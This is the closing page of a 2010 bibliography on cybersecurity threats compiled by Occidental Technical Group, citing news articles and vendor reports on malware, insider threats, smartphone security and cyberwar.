    http://www.networkworld.com/news/2010/101810-malware-targets-ips.html
   Smartphones: The New Hacker Frontier – Light Reading Mobile – http://www.lightreading.com
   Sys admin gone rogue is biggest insider threat, Ellen Messmer, NetworkWorld, Sept 2010
   Take Back The Endpoint, Sept 2010- http://usa.kaspersky.com/resources/
   The Business Mobility Explosion: Improve Data Security, Compliance and Manageability -
    http://www.itsecurity.com/events/business-mobility-explosion-its/
   China Telcom Denies US web hijack allegations - The Economic Times, Nov 18, 2010
   The Hacker who went into the Cold – New York Times Magazine, Nov 14, 2010
   The Online Threat, Seymour M. Hersh, The New Yorker, November 2010
   The Risks of Social Networking, Candid Wuest, http://symantec.com
   U.S. Workers are on Alert After Breach of Data – New York Times, Nov 7, 2010
   You Need a Smartphone Security Suite – PCMag.com Security Watch Blog
   War in the fifth domain – The Economist, July 2010
   Web Malware 101, Jan 2010 – An iDefense Focused Intelligence Report




                  Compiled by Maureen Stubblefield – Occidental Technical Group, LLC 2010
                                               Page 15 of 15

				
DOCUMENT INFO